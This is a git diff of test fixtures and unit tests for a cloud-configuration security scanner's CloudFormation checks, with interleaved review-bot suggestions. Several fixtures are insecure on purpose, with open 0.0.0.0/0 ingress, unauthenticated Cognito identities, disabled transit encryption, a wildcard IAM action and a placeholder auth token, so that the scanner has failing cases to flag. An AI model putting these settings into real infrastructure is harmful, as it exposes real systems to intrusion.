@@ -1,55 +0,0 @@ -import pytest - -from checkov.circleci_pipelines.image_referencer.provider import CircleCIProvider -from checkov.circleci_pipelines.runner import Runner - - -def test_extract_images_from_workflow(circle_ci_filepath_workflow_with_images_config, - circle_ci_image1, circle_ci_image2): - file_path, config = circle_ci_filepath_workflow_with_images_config - - provider = CircleCIProvider(file_path=file_path, workflow_config=config) - images = provider.extract_images_from_workflow() - - assert set(images) == {circle_ci_image1, circle_ci_image2} - - -def test_extract_images_from_workflow_no_images(circle_ci_filepath_workflow_no_images_config): - file_path, config = circle_ci_filepath_workflow_no_images_config - - provider = CircleCIProvider(file_path=file_path, workflow_config=config) - images = provider.extract_images_from_workflow() - - assert not images - -@pytest.mark.parametrize( - "start_line, end_line, tag, supported_entities, old_key_format, expected_key", - [ - (21, - 22, - 'jobs', - ('jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}',), - 'jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.CKV_CIRCLECIPIPELINES_1[85:86]', - "jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)"), - (16, - 18, - 'executors', - ('executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}',), - 'executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.CKV_CIRCLECIPIPELINES_8[16:18]', - "executors(image-executor).docker.image[1](mongo:2.6.8)") - ] -) -def test_generate_resource_key_generates_same_key_as_get_resource(file_path, - start_line, end_line, tag, - supported_entities, - old_key_format, expected_key, - 
circleci_config_with_images_definitions): - definitions = circleci_config_with_images_definitions.get(file_path) - provider = CircleCIProvider(definitions, file_path) - runner = Runner() - runner.definitions[file_path] = definitions - - key1 = runner.get_resource(file_path, old_key_format, supported_entities, start_line, end_line) - key2 = provider.generate_resource_key(start_line, end_line, tag) - - assert key1 == key2 == expected_key diff --git a/tests/circleci_pipelines/image_referencer/test_runner.py b/tests/circleci_pipelines/image_referencer/test_runner.py deleted file mode 100644 index 5b921f19e5a..00000000000 --- a/tests/circleci_pipelines/image_referencer/test_runner.py +++ /dev/null 
@@ -1,68 +0,0 @@ -from pathlib import Path - -from checkov.circleci_pipelines.runner import Runner -from checkov.common.bridgecrew.bc_source import get_source_type -from checkov.common.bridgecrew.check_type import CheckType - -from checkov.runner_filter import RunnerFilter -from pytest_mock import MockerFixture - -from tests.common.image_referencer.test_utils import mock_get_empty_license_statuses_async, \ - mock_get_image_cached_result_async - -RESOURCES_PATH = Path(__file__).parent.parent / "resources" - - -def test_circleCI_workflow(mocker: MockerFixture, file_path, image_cached_results_for_report): - from checkov.common.bridgecrew.platform_integration import bc_integration - test_file = RESOURCES_PATH / file_path - - runner_filter = RunnerFilter(run_image_referencer=True) - bc_integration.bc_source = get_source_type("disabled") - - mocker.patch( - "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", - side_effect=mock_get_image_cached_result_async, - ) - mocker.patch( - "checkov.common.images.image_referencer.get_license_statuses_async", - side_effect=mock_get_empty_license_statuses_async, - ) - - reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(reports) == 2 - - circleci_report = next(report for report in reports if report.check_type == CheckType.CIRCLECI_PIPELINES) - sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) - - assert len(circleci_report.resources) == 0 - assert len(circleci_report.passed_checks) == 32 - assert len(circleci_report.failed_checks) == 13 - assert len(circleci_report.skipped_checks) == 0 - assert len(circleci_report.parsing_errors) == 0 - - assert len(sca_image_report.extra_resources) == 10 - assert len(sca_image_report.image_cached_results) == 10 - - got_images = ({ - 'image_name': image['dockerImageName'], - 'related_resource_id': image['relatedResourceId'], - 'packages': image['packages'] - } 
for image in sca_image_report.image_cached_results) - for image in got_images: - assert image in image_cached_results_for_report - assert len(sca_image_report.extra_resources) == 10 - assert len(sca_image_report.image_cached_results) == 10 - - -def test_runner_image_check(file_path): - test_file = RESOURCES_PATH / file_path - runner_filter = RunnerFilter(framework=['circleci_pipelines'], checks=['CKV_CIRCLECIPIPELINES_8']) - - report = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(report.failed_checks) == 0 - assert report.parsing_errors == [] - assert len(report.passed_checks) == 12 - assert report.skipped_checks ==[] diff --git a/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml new file mode 100644 index 00000000000..8a5d5e8d9a8 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml @@ -0,0 +1,8 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: Identity pool +Resources: + Fail: + Type: AWS::Cognito::IdentityPool + Properties: + AllowClassicFlow: True + AllowUnauthenticatedIdentities: True diff --git a/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml new file mode 100644 index 00000000000..b1fd73c9445 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml @@ -0,0 +1,8 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: Identity pool +Resources: + Pass: + Type: AWS::Cognito::IdentityPool + Properties: + AllowClassicFlow: True + AllowUnauthenticatedIdentities: False 
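Review bot: PASSED.yaml only covers an explicit `AllowUnauthenticatedIdentities: False`; no resource in either fixture omits the property, so the check's behaviour on an absent key is untested. The property is optional and, as far as I recall, defaults to false on the service side, so the omitted form is the common real-world shape and exactly where a presence-based check tends to misfire. Add a second resource of the same type to PASSED.yaml — e.g. `PassDefault` whose `Properties` carry only `AllowClassicFlow: True` — and list it in whichever expected set the check intends in test_CognitoUnauthenticatedIdentities.py.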
diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml index 848a622d6db..d946d9b07f9 100644 --- a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml +++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml @@ -110,7 +110,7 @@ Resources: SubnetIds: - !Ref SubnetA - !Ref SubnetB - ReplicationGroup: + ReplicationGroupFail: Type: 'AWS::ElastiCache::ReplicationGroup' Properties: AutomaticFailoverEnabled: !Ref MultiAZSupport @@ -131,16 +131,3 @@ Resources: SnapshotWindow: !Ref SnapshotWindow #TransitEncryptionEnabled: False TransitEncryptionEnabled: True -Outputs: - RGEndpoint: - Description: The primary endpoint location - Value: !Join - - '' - - - 'redis://' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Address - - ':' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Port diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml new file mode 100644 index 00000000000..be814c09922 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml 
@@ -0,0 +1,135 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: >- + An example template that stands up an ElastiCache Replication Group Multi-AZ in a particular VPC specifying then a Subnet Group and a Security Group, VpcId is not directly referenced by the Replication Group resource, and is instead inferred by the Security Group and Subnet Group. +Parameters: + CacheNodeType: + Description: The instance type the nodes will launch under. + Type: String + Default: cache.m3.medium + AllowedValues: + - cache.t2.micro + - cache.t2.small + - cache.t2.medium + - cache.m3.medium + - cache.m3.large + - cache.m3.xlarge + - cache.m3.2xlarge + - cache.r3.large + - cache.r3.xlarge + - cache.r3.2xlarge + - cache.r3.4xlarge + - cache.r3.8xlarge + MultiAZSupport: + Description: >- + Indicates whether Multi-AZ is enabled. When Multi-AZ is enabled, a + read-only replica is automatically promoted to a read-write primary + cluster if the existing primary cluster fails. If you specify true, you must specify a value greater than 1 for the NumCacheClusters property. + Type: String + Default: 'true' + AllowedValues: + - 'true' + - 'false' + NumCacheClusters: + Description: >- + The number of cache clusters for this replication group. If MultiAZ + support is enabled, you must specify a value greater than 1. + Default: '2' + Type: Number + MinValue: '1' + MaxValue: '6' + RedisPort: + Description: >- + The port number on which each member of the replication group accepts + connections. + Type: Number + Default: '6379' + MinValue: '1' + MaxValue: '65535' + ReplicationGroupDescription: + Description: The description of the replication group. 
+ Type: String + Default: Example replication group + VpcId: + Description: The VPC to create this ReplicationGroup under + Type: 'AWS::EC2::VPC::Id' + CidrIp: + Description: The CIDR you want to access to the Replication Group + Type: String + Default: 0.0.0.0/0 + AllowedPattern: '(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})/(\d{1,2})' + MinLength: '9' + MaxLength: '18' + ConstraintDescription: must be a valid IP CIDR range of the form x.x.x.x/x + SnapshotRetentionLimit: + Description: >- + The number of days that ElastiCache retains automatic snapshots before + deleting them. + Type: Number + Default: '7' + SnapshotWindow: + Description: >- + The time range (in UTC) when ElastiCache takes a daily snapshot of your node group. + Type: String + Default: '05:00-09:00' + AllowedPattern: '\d{2}:\d{2}-\d{2}:\d{2}' + ConstraintDescription: 'must be a valid timestamp range, for example 05:00-09:00' + PreferredMaintenanceWindow: + Description: >- + The weekly time range during which system maintenance can occur. Use the following format to specify a time range: ddd:hh24:mi-ddd:hh24:mi (24H Clock UTC). + Type: String + Default: 'sun:22:00-sun:23:30' + AllowedPattern: >- + (mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2}-(mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2} + ConstraintDescription: >- + must be a valid timestamp range with day of week, for example + sun:22:00-sun:23:30 + SubnetA: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' + SubnetB: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. 
In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' +Resources: + SecurityGroup: + Type: 'AWS::EC2::SecurityGroup' + Properties: + GroupDescription: Security Group for Example Replication Group + SecurityGroupIngress: + - Description: Redis Traffic + CidrIp: !Ref CidrIp + FromPort: !Ref RedisPort + ToPort: !Ref RedisPort + IpProtocol: tcp + VpcId: !Ref VpcId + SubnetGroup: + Type: 'AWS::ElastiCache::SubnetGroup' + Properties: + Description: Subnet Group for Example Replication Group + SubnetIds: + - !Ref SubnetA + - !Ref SubnetB + ReplicationGroupFail2: + Type: 'AWS::ElastiCache::ReplicationGroup' + Properties: + AutomaticFailoverEnabled: !Ref MultiAZSupport + AtRestEncryptionEnabled: True + #AtRestEncryptionEnabled: False # Optional parameter + CacheNodeType: !Ref CacheNodeType + CacheSubnetGroupName: !Ref SubnetGroup + Engine: redis + NumCacheClusters: !Ref NumCacheClusters + Port: !Ref RedisPort + PreferredMaintenanceWindow: !Ref PreferredMaintenanceWindow + ReplicationGroupDescription: !Ref ReplicationGroupDescription + SecurityGroupIds: + - !GetAtt + - SecurityGroup + - GroupId + SnapshotRetentionLimit: !Ref SnapshotRetentionLimit + SnapshotWindow: !Ref SnapshotWindow + #TransitEncryptionEnabled: False + TransitEncryptionEnabled: False + UserGroupIds: + - Example diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml index 31137999bd5..55b459be5ab 100644 --- a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml 
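Review bot: All four fixtures in this directory set `TransitEncryptionEnabled` explicitly (`False` here, `True` in the others), so the template that simply leaves the key out — which I believe leaves in-transit encryption disabled by default — is never exercised. FAILED2 also pairs the disabled flag with `UserGroupIds`, so the encryption flag rather than a missing credential drives the failure; a third failing resource with no `TransitEncryptionEnabled` key and neither `AuthToken` nor `UserGroupIds` would pin both gaps. Unrelated to this check but worth a thought since the file is copied verbatim: the `CidrIp` parameter default of `0.0.0.0/0` on the security group will fire other checks in an unfiltered run.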
+++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml @@ -110,7 +110,7 @@ Resources: SubnetIds: - !Ref SubnetA - !Ref SubnetB - ReplicationGroup: + ReplicationGroupPass: Type: 'AWS::ElastiCache::ReplicationGroup' Properties: AuthToken: 'MySecret!AuthToken$' @@ -132,16 +132,4 @@ Resources: SnapshotWindow: !Ref SnapshotWindow #TransitEncryptionEnabled: False TransitEncryptionEnabled: True -Outputs: - RGEndpoint: - Description: The primary endpoint location - Value: !Join - - '' - - - 'redis://' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Address - - ':' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Port + diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml new file mode 100644 index 00000000000..0c71e1fecbc --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml 
@@ -0,0 +1,136 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: >- + An example template that stands up an ElastiCache Replication Group Multi-AZ in a particular VPC specifying then a Subnet Group and a Security Group, VpcId is not directly referenced by the Replication Group resource, and is instead inferred by the Security Group and Subnet Group. +Parameters: + CacheNodeType: + Description: The instance type the nodes will launch under. + Type: String + Default: cache.m3.medium + AllowedValues: + - cache.t2.micro + - cache.t2.small + - cache.t2.medium + - cache.m3.medium + - cache.m3.large + - cache.m3.xlarge + - cache.m3.2xlarge + - cache.r3.large + - cache.r3.xlarge + - cache.r3.2xlarge + - cache.r3.4xlarge + - cache.r3.8xlarge + MultiAZSupport: + Description: >- + Indicates whether Multi-AZ is enabled. When Multi-AZ is enabled, a + read-only replica is automatically promoted to a read-write primary + cluster if the existing primary cluster fails. If you specify true, you must specify a value greater than 1 for the NumCacheClusters property. + Type: String + Default: 'true' + AllowedValues: + - 'true' + - 'false' + NumCacheClusters: + Description: >- + The number of cache clusters for this replication group. If MultiAZ + support is enabled, you must specify a value greater than 1. + Default: '2' + Type: Number + MinValue: '1' + MaxValue: '6' + RedisPort: + Description: >- + The port number on which each member of the replication group accepts + connections. + Type: Number + Default: '6379' + MinValue: '1' + MaxValue: '65535' + ReplicationGroupDescription: + Description: The description of the replication group. 
+ Type: String + Default: Example replication group + VpcId: + Description: The VPC to create this ReplicationGroup under + Type: 'AWS::EC2::VPC::Id' + CidrIp: + Description: The CIDR you want to access to the Replication Group + Type: String + Default: 0.0.0.0/0 + AllowedPattern: '(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})/(\d{1,2})' + MinLength: '9' + MaxLength: '18' + ConstraintDescription: must be a valid IP CIDR range of the form x.x.x.x/x + SnapshotRetentionLimit: + Description: >- + The number of days that ElastiCache retains automatic snapshots before + deleting them. + Type: Number + Default: '7' + SnapshotWindow: + Description: >- + The time range (in UTC) when ElastiCache takes a daily snapshot of your node group. + Type: String + Default: '05:00-09:00' + AllowedPattern: '\d{2}:\d{2}-\d{2}:\d{2}' + ConstraintDescription: 'must be a valid timestamp range, for example 05:00-09:00' + PreferredMaintenanceWindow: + Description: >- + The weekly time range during which system maintenance can occur. Use the following format to specify a time range: ddd:hh24:mi-ddd:hh24:mi (24H Clock UTC). + Type: String + Default: 'sun:22:00-sun:23:30' + AllowedPattern: >- + (mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2}-(mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2} + ConstraintDescription: >- + must be a valid timestamp range with day of week, for example + sun:22:00-sun:23:30 + SubnetA: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' + SubnetB: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. 
In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' +Resources: + SecurityGroup: + Type: 'AWS::EC2::SecurityGroup' + Properties: + GroupDescription: Security Group for Example Replication Group + SecurityGroupIngress: + - Description: Redis Traffic + CidrIp: !Ref CidrIp + FromPort: !Ref RedisPort + ToPort: !Ref RedisPort + IpProtocol: tcp + VpcId: !Ref VpcId + SubnetGroup: + Type: 'AWS::ElastiCache::SubnetGroup' + Properties: + Description: Subnet Group for Example Replication Group + SubnetIds: + - !Ref SubnetA + - !Ref SubnetB + ReplicationGroupPass2: + Type: 'AWS::ElastiCache::ReplicationGroup' + Properties: + AutomaticFailoverEnabled: !Ref MultiAZSupport + AtRestEncryptionEnabled: True + #AtRestEncryptionEnabled: False # Optional parameter + CacheNodeType: !Ref CacheNodeType + CacheSubnetGroupName: !Ref SubnetGroup + Engine: redis + NumCacheClusters: !Ref NumCacheClusters + Port: !Ref RedisPort + PreferredMaintenanceWindow: !Ref PreferredMaintenanceWindow + ReplicationGroupDescription: !Ref ReplicationGroupDescription + SecurityGroupIds: + - !GetAtt + - SecurityGroup + - GroupId + SnapshotRetentionLimit: !Ref SnapshotRetentionLimit + SnapshotWindow: !Ref SnapshotWindow + #TransitEncryptionEnabled: False + TransitEncryptionEnabled: True + UserGroupIds: + - Example + diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml new file mode 100644 index 00000000000..2f2fb8d24cc --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml 
@@ -0,0 +1,38 @@ +Resources: + BasicNotebookInstancePASS: + Type: "AWS::SageMaker::NotebookInstance" + Properties: + InstanceType: "ml.t2.large" + RoleArn: "!GetAtt ExecutionRole.Arn" + KmsKeyId: "bla bla" + BasicNotebookInstanceFAIL: + Type: "AWS::SageMaker::NotebookInstance" + Properties: + InstanceType: "ml.t2.large" + RoleArn: "!GetAtt ExecutionRole.Arn" + + BasicDomainPASS: + Metadata: + cfn-lint: + config: + ignore_checks: + - E3002 + - E3030 + - E3003 + Type: "AWS::SageMaker::Domain" + Properties: + InstanceType: "ml.t2.large" + RoleArn: "!GetAtt ExecutionRole.Arn" + KmsKeyId: "bla bla" + BasicDomainFAIL: + Metadata: + cfn-lint: + config: + ignore_checks: + - E3002 + - E3030 + - E3003 + Type: "AWS::SageMaker::Domain" + Properties: + InstanceType: "ml.t2.large" + RoleArn: "!GetAtt ExecutionRole.Arn" diff --git a/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py b/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py new file mode 100644 index 00000000000..cdba703f9f7 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py 
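Review bot: `KmsKeyId: "bla bla"` makes the PASS resources pass on property presence alone, so the fixture cannot show whether the check distinguishes a customer-managed key from the AWS-managed `alias/aws/sagemaker` key, which is the distinction the check name (`...EncryptedWithCMK`) implies; add a resource with `KmsKeyId: alias/aws/sagemaker` and decide explicitly which set it belongs to, and use a key-shaped value (an alias or key ARN) for the genuine pass cases. `RoleArn: "!GetAtt ExecutionRole.Arn"` is a quoted string, not an intrinsic, so it references nothing — harmless here but misleading as an example. The two `AWS::SageMaker::Domain` resources carry NotebookInstance properties (`InstanceType`, `RoleArn`) and then suppress the resulting cfn-lint errors; giving them the Domain's own required properties (`AuthMode`, `DomainName`, `DefaultUserSettings`, `SubnetIds`, `VpcId`, per the resource spec) next to `KmsKeyId` would keep the fixture valid without the `ignore_checks` block.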
@@ -0,0 +1,46 @@ +import os +import unittest + +from checkov.cloudformation.checks.resource.aws.CognitoUnauthenticatedIdentities import check +from checkov.cloudformation.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestCognitoUnauthenticatedIdentities(unittest.TestCase): + + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_CognitoUnauthenticatedIdentities" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + for record in report.failed_checks: + self.assertEqual(record.check_id, check.id) + + for record in report.passed_checks: + self.assertEqual(record.check_id, check.id) + + passing_resources = { + "AWS::Cognito::IdentityPool.Pass", + } + + failing_resources = { + "AWS::Cognito::IdentityPool.Fail", + + } + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary['passed'], len(passing_resources)) + self.assertEqual(summary['failed'], len(failing_resources)) + self.assertEqual(summary['skipped'], 0) + self.assertEqual(summary['parsing_errors'], 0) + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == '__main__': + unittest.main() diff --git a/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py index caaa9dab012..49a069de7a8 100644 --- a/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py +++ b/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py 
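Review bot: `set([c.resource for c in report.passed_checks])` (and its `failed_checks` twin) builds a throwaway list before the set; write them as set comprehensions, `{c.resource for c in report.passed_checks}` / `{c.resource for c in report.failed_checks}`. `current_dir + "/example_CognitoUnauthenticatedIdentities"` is more portable as `os.path.join(current_dir, "example_CognitoUnauthenticatedIdentities")`. The stray blank line inside the `failing_resources` literal can go.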
@@ -16,10 +16,25 @@ def test_summary(self): report = runner.run(root_folder=test_files_dir,runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() - self.assertEqual(summary['passed'], 1) - self.assertEqual(summary['failed'], 1) - self.assertEqual(summary['skipped'], 0) - self.assertEqual(summary['parsing_errors'], 0) + passing_resources = { + "AWS::ElastiCache::ReplicationGroup.ReplicationGroupPass", + "AWS::ElastiCache::ReplicationGroup.ReplicationGroupPass2", + } + failing_resources = { + "AWS::ElastiCache::ReplicationGroup.ReplicationGroupFail", + "AWS::ElastiCache::ReplicationGroup.ReplicationGroupFail2", + } + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) if __name__ == '__main__': diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py new file mode 100644 index 00000000000..1c46768d336 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py 
@@ -0,0 +1,41 @@ +import os +import unittest + +from checkov.cloudformation.checks.resource.aws.SagemakerNotebookEncryptedWithCMK import check +from checkov.cloudformation.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestSagemakerNotebookEncryptedWithCMK(unittest.TestCase): + + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_SagemakerNotebookEncryptedWithCMK" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + "AWS::SageMaker::NotebookInstance.BasicNotebookInstancePASS", + "AWS::SageMaker::Domain.BasicDomainPASS" + } + failing_resources = { + "AWS::SageMaker::NotebookInstance.BasicNotebookInstanceFAIL", + "AWS::SageMaker::Domain.BasicDomainFAIL" + } + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml new file mode 100644 index 00000000000..edcaf4cb2bc --- /dev/null +++ b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml 
@@ -0,0 +1,8 @@ +pass: + - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_pass" + - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_pass2" +fail: + - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_fail" +evaluated_keys: + - 'AssumeRolePolicyDocument/Statement[?(@/Effect == Allow)]/Action[*]' + - 'resource_type' diff --git a/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml new file mode 100644 index 00000000000..62879334133 --- /dev/null +++ b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml 
@@ -0,0 +1,64 @@ +Resources: + aws_sagemaker_notebook_instance_pass: + Type: AWS::SageMaker::NotebookInstance + Properties: + NotebookInstanceName: my-notebook-instance + InstanceType: "" + RoleArn: !GetAtt aws_iam_role.Arn + + aws_iam_role: + Type: AWS::IAM::Role + Properties: + AssumeRolePolicyDocument: + Version: '2012-10-17' + Statement: + - Effect: Allow + Principal: + Service: sagemaker.amazonaws.com + Action: sts:AssumeRole + + aws_sagemaker_notebook_instance_pass2: + Type: AWS::SageMaker::NotebookInstance + Properties: + NotebookInstanceName: my-notebook-instance + ServiceToken: "" + RoleArn: !GetAtt aws_iam_role2.Arn + + aws_iam_role2: + Type: AWS::IAM::Role + Properties: + AssumeRolePolicyDocument: + Version: '2012-10-17' + Statement: + - Effect: Allow + Principal: + Service: sagemaker.amazonaws.com + Action: sts:AssumeRole + Policies: + - PolicyName: my-policy + PolicyDocument: + Version: '2012-10-17' + Statement: + - Effect: Allow + Action: sagemaker:* + Resource: !Sub 'arn:aws:sagemaker:${AWS::Region}:${AWS::AccountId}:notebook-instance/*' + Condition: + IpAddress: + 'aws:SourceIp': '192.0.2.0/24' + + aws_sagemaker_notebook_instance_fail: + Type: AWS::SageMaker::NotebookInstance + Properties: + NotebookInstanceName: my-notebook-instance + RoleArn: !GetAtt aws_iam_role3.Arn + + aws_iam_role3: + Type: AWS::IAM::Role + Properties: + AssumeRolePolicyDocument: + Version: '2012-10-17' + Statement: + - Effect: Allow + Principal: + Service: sagemaker.amazonaws.com + Action: '*' diff --git a/tests/cloudformation/graph/checks/test_yaml_policies.py b/tests/cloudformation/graph/checks/test_yaml_policies.py index bd1559557ae..38ba819fcc7 100644 --- a/tests/cloudformation/graph/checks/test_yaml_policies.py +++ b/tests/cloudformation/graph/checks/test_yaml_policies.py 
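Review bot: The only failing resource fails because its trust policy (`AssumeRolePolicyDocument`) grants `Action: '*'`, which matches the `evaluated_keys` in expected.yaml but not what the check name (`...IAMPolicyOverlyPermissiveToAllTraffic`) suggests: a wildcard action in a trust policy is an unusual shape, whereas the realistic risk is an inline or attached permissions policy with `Action: '*'`/`Resource: '*'` and no source-IP condition, and that path has no fixture — `aws_iam_role2`'s inline `sagemaker:*` statement is IP-conditioned and expected to pass. Add a fourth notebook instance whose role carries an unconditioned wildcard permissions policy and state in expected.yaml which outcome the check intends for it; if the check deliberately inspects only the trust policy, its name and description should say so. Minor: `InstanceType: ""` on the first pass resource and `ServiceToken: ""` on the second look like leftovers rather than intended inputs.
```yaml
# … unchanged: aws_sagemaker_notebook_instance_pass / pass2 / fail and their roles …
  aws_sagemaker_notebook_instance_fail2:
    Type: AWS::SageMaker::NotebookInstance
    Properties:
      NotebookInstanceName: my-notebook-instance
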